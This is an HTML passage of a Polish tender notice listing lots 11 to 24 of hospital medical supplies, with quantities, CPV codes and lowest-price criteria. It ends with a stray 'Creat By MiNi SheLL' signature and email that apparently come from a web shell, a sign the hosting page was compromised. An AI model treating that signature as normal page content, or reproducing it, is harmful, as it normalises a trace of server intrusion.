<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> szczoteczki cytologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	SZCZOTECZKI CYTOLOGICZNE J.U.	2 000,000	SZT
2	utrwalacz cytologiczny	10,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> koszyczki dormia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	KOSZYCZKI DORMIA NR 4 DŁ 90 CM Z UKOŚNĄ PĘTLĄ	20,000	SZT
2	KOSZYCZKI DORMIA NR 5 DŁ 90 CM Z UKOŚNĄ PĘTLĄ	20,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> elektrody do diatermii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	JEDNORAZOWY UCHWYT Z NOŻEM 2 PRZYCISKI ( sterowane ręcznie )Z WTYKIEM 3-BOLCOWYM	900,000	SZT
2	Elektroda bierna jednorazowa, dzielona, owalna, nie wymagająca orientacji. Wykonana z włókniny zapobiegającej powstawaniu odpażeń z niezależnym pierścieniem  potencjału o wymiarze 85cm2 i powierzchni pierścienia 23cm2	5,000	OPAK.
3	Elektroda neutralna silikonowa z kablem 4m, do aparatów EMED 400 i ERBE VIO 300. Wymiary 500cm2	9,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.71.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> maski tlenowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	MASKA TLENOWA DLA DZIECI	150,000	SZT
2	MASKA TLENOWA DLA DZIECI Z NEBULIZATOREM	400,000	SZT
3	MASKA TLENOWA DLA DOROSŁYCH	1 000,000	SZT
4	MASKA TLENOWA DLA DOROSŁYCH Z NEBULIZATOREM	1 000,000	SZT
5	MASKA TLENOWA DLA NOWORODKÓW j.u.	20,000	SZT
6	OKULARY TLENOWE	6 000,000	SZT
7	OKULARY DO FOTOTERAPII DLA NOWORODKA	400,000	SZT
8	DREN TLENOWY	1 000,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> pojemniki na odpady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	Pojemnik na odpady 0,7l płaski	1 500,000	SZT
2	Pojemnik na odpady 1l	1 000,000	SZT
3	Pojemnik na odpady 2l	600,000	SZT
4	Pojemnik na odpady 5l.	2 000,000	SZT
5	Pojemnik na odpady 10l	2 000,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> zestawy do lewatywy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	ZESTAW DO LEWATYWY	800,000	SZT
2	ZGŁĘBNIK ŻOŁĄDKOWO-DWUNASTNICZY-DWUKANAŁOWY TYPU DREN W DRENIE    -SALEM-	10,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> pozostałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	SZPATUŁKI	40 000,000	SZT
2	OPASKA DO IDENT. NIEM.	4 000,000	SZT
3	OPASKA DO IDENT. DLA DOROSŁYCH	6 000,000	SZT
4	OSŁONKA NA GŁOWICĘ	3 000,000	SZT
5	PENSETA J.U.	500,000	SZT
6	ZACISKACZ DO PĘPOWINY	500,000	SZT
7	ZESTAW DO ASCEPTYCZNEGO TRANSFERU JAŁ.PŁYNÓW	300,000	SZT
8	OPATRUNEK HYDROŻELOWY	100,000	SZT
9	PIELUCHOMAJTKI	40 000,000	SZT
10	POJEMNIK NA KAŁ Z ŁOPATKĄ	500,000	SZT
11	PRZEWÓD DO CYSTOSKOPII I RETROSKOPII-PODWÓJNY	200,000	SZT
12	KACZKA J.UŻYTKU.	500,000	SZT
13	Nerka j.u.	200,000	SZT
14	WORECZEK DO PRÓBEK MOCZU/DZIECI	1 000,000	SZT
15	Worek do zbiórki moczu z odp.2l.	3 000,000	SZT
16	CHUSTA TRÓJKĄTNA	200,000	SZT
17	WZIERNIK GIN.	5 000,000	SZT
18	KOSZYKI DO WORKÓW (WIESZAKI)	600,000	SZT
19	Kubek na mocz	20 000,000	SZT
20	kubek na mocz ster.	2 000,000	SZT
21	ŁĄCZNIK DO REGULOWANEJ SIŁY SSANIA	500,000	SZT
22	OPASKA UCISKOWA DO POBIERANIA KRWI-automatyczna	150,000	SZT
23	ŻEL DO EKG 0,25L	100,000	SZT
24	ŻEL DO USG 0,5	200,000	SZT
25	ŻEL DO USG 5L	100,000	L
26	ŻEL DO ZNIECZULEŃ	30,000	SZT
27	ŻEL ŚCIERNY	10,000	SZT
28	KOC IZOTERMICZNY	700,000	SZT
29	POJEMNIK REDONA JAŁOWY 200ML	600,000	SZT
30	RURKA SIGMOIDOSKOPOWA DO REKTOSKOPU 25CM	200,000	SZT
31	KIELISZKI DO LEKÓW PLASTIKOWE	50 000,000	SZT
32	SZCZOTKI DO RĄK JEDNORAZOWE, JAŁOWE, NASĄCZONE CHLORHEKSYDYNĄ LUB MANUSANEM	2 500,000	SZT
33	KOŃCÓWKA DO ODSYSANIA POLA OPERACYJNEGO Z PRZEWODEM SSĄCYM (ŚR.7MM) YANKAUER Z DRENEM	150,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> produkty do odsysania i zbiórki wy-dzielin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	WKŁADY WORKOWE 2L J.U (SERRES)	500,000	SZT
2	WKŁADY WORKOWE 3L J.U (SERRES)	300,000	SZT
3	ZESTAWY 2-BUTL. DO ODSYS.WYDZIELIN Z OPŁUCNEJ	20,000	SZT
4	DREN Z TROKAREM DO DRENAŻU JAMY OPŁUCNEJ JAŁOWY CH 20	15,000	SZT
5	DREN Z TROKAREM DO DRENAŻU JAMY OPŁUCNEJ JAŁOWY CH 24	15,000	SZT
6	DREN Z TROKAREM DO DRENAŻU JAMY OPŁUCNEJ JAŁOWY CH 28	15,000	SZT
7	SYSTEM DO DRENAŻU PIERSIOWEGO Z DWOMA BUTEL.- THORAFLOW	10,000	SZT
8	DRENY ŁĄCZĄCE STERYLNE 2-3 M, ŚR. WEW. 6-7MM DO WKŁADÓW WORKOWYCH	50,000	SZT
9	JAŁOWY ZESTAW DO ODSYSANIA POLA OPERACYJNEGO(YANKAUER)	500,000	SZT
10	ZESTAW DO PUNKCJI 3-IGŁOWY  Z KRANIKIEM TRÓJDROŻNYM Z WORKIEM 2L 	10,000	SZT
11	ZESTAW DO PUNKCJI JAMY OPŁUCNEJ Z KANIULĄ 1,8MM/80MM 	10,000	SZT
12	KANKA YANKAUER BEZ KONT. Z DRENEM	400,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> igły do biopsji stercza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	IGŁY DO BIOPSJI STERCZA KOMPATYBILNE Z APARATEM PRO-MAG, 20CM	300,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> materiały chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	KLIPSY TYTANOWE M/L - HEMOCLIP	1 300,000	SZT
2	SIATKI PRZEPUKLINOWE JAŁOWE 30X30	15,000	SZT
3	Siatka przpuklinowa7,5x15	25,000	SZT
4	Siatka przepuklinowa 5x10	20,000	SZT
5	siatka niewch. bardzo lekka elast. polipropylenowa do zaopatrywania przepuklin pach gr,0,39mm waga 36gr/m2 i pory o wielkości do1mm wym.7,5x15mm	40,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> materiały operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	ZESTAW SERWET DO PROCEDUR OPERACYJNYCH JEDNORAZOWY, UNIWERSALNY/PODSTAWOWY	500,000	KPL
2	ZESTAW SERWET DO PROCEDUR UROLOGICZNYCH (TUR).	250,000	SZT
3	STERYLNY ZESTAW DO CIĘCIA CESARSKIEGO	250,000	KPL
4	ZESTAW DO ZABIEGÓW GINEKOLOGICZNYCH DOLNYCH	260,000	SZT
5	Zestaw do operacji kończyn-serweta 200-245-320 elastyczna przesłona 7cm z łatą chłonną i uczhwytem na przewody	80,000	SZT
6	Zestaw do operacji żylaków	80,000	SZT
7	Zestaw do przyjęcia porodu	250,000	SZT
8	JEDNORAZOWY JAŁOWY FARTUCH CHIRURGICZNY PEŁNOBARIEROWY ZGODNY Z EN 13795 1-3, ROZM L	400,000	SZT
9	STERYLNA FOLIA OSŁONA NA STOLIK MAYO, NIEPRZEMAKALNA Z WARSTWĄ CHŁONNĄ W KOLORZE CZERW.ROZM 80X145CM	1 000,000	SZT
10	Sterylna osłona na przewody 13-15x230cm	1 000,000	SZT
11	SAMOPRZYLEPNA TAŚMA TYPU RZEP, ROZM. 2CM X 23CM	100,000	SZT
12	Sterylna pełnobarierowa serweta wykonana z minimum dwuwarstwowego chłonnego nieprzemakalnego laminatu PE+PP be zprzylepca 50x60	100,000	SZT
13	Sterylna pełnobarierowa serweta z minimum dwuwarstwowego chłonnego nieprzemakalnego laminatu PE+PP z przylepcem 50x60	200,000	SZT
14	sterylna pełnobarierowa serweta wykonana z minimum dwuwarstwowego chłonnego nieprzemakalnego laminatu PE+PP w częci chłonnej	500,000	SZT
15	Sterylna, pełnobarierowa serwetw wykonana z minimum dwuwarstwowego chłonnego nieprzemakalnego laminatu PE+PP ot.6x8cm, 50cmx60cm	100,000	SZT
16	Sterylna, pełnobarierowa serweta wykonana minimum dwuwarstwowego chłonnego nieprzemakalnegolaminatu PE+PP otczony taśmą przylepną 50cmx 60cm	300,000	SZT
17	Ste., pełnobarierowa serweta wykonana z nimimum dwuwarstwowego chłonnego nieprz. laminatu PE+PP w części chłonnej polipropylen ot.6x8, taśmą 75cmx90cm	300,000	SZT
18	Sterylna ściereczka chłonna o wymiarach minimum 30x40cm wykonana z bardzo chłonnej celulozy, służąca do wycierania rąk po umyciu	1 000,000	SZT
19	Zestaw podstawowy skład zestawu
1serweta na stolik  150x100cm
2serweta samoprzylepna 170x175cm
3seweta samoprzylepna 75x90cm
4fartuch chirurgiczny	12,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> zestawy do szynowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	ZESTAW DO SZYNOWANIA WEW. MOCZOWODÓW 5/26/2	20,000	SZT
2	ZESTAW DO SZYNOWANIA WEW. MOCZOWODÓW 6/28/4	20,000	SZT
3	ZESTAW DO SZYNOWANIA WEW. MOCZOWODÓW 8/30/4	15,000	SZT
4	ZESTAW DO SZYNOWANIA WEW.MOCZOWODÓW 6/26/4	15,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> materiały ginekologiczne do leczenia nietrzymania moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	Zestaw do leczenia statyki dna miednicy mniejszej-  Plastyka przednia pochwy I                       	24,000	SZT
2	Zestaw do leczenia zaburzeń statyki dna miadnicy mniejszej. Plastyka przednia pochwy II	24,000	SZT
3	Zestaw do lezcenia zaburzeń statyki dna miednicy-Plastyka tylna pochwy	24,000	SZT
4	Taśma do leczenia wysiłkowego nietrzymania moczu u kobiet 	18,000	SZT
5	Taśma do leczenia wysiłkowego nietrzymania moczu u kobiet II ( współistniejącego z cystocele )	18,000	SZT
6	Taśma do leczenia wysiłkowego nietrzymania mioczu u kobiet III ( współistniejącego z cystocele )	18,000	SZT
7	Siatka lekka, miękka polipropylen monofilamentowy, dwukierunkowa elastyczność roz.6x30	18,000	SZT
8	Siatka lekka, miękka polipropylen monofilamentowy, dwukierunkowa elastyczność roz.30x30	18,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> prześcieradła chłonne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	Jednorazowy, wysokochłonny, nie uczulający podkład higieniczny na stół operacyjny wykonany z 2 calowych powłok	400,000	SZT
2	Jednorazowy wysokochłonny nie uczulający podkład higieniczy na stół operacyjny 	200,000	SZT
3	Mata na podłogę, o dużej wchłanialności płynów, z możliwością przytwierdzania do [podłogi. o wymiarach 81cmX121cm	200,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com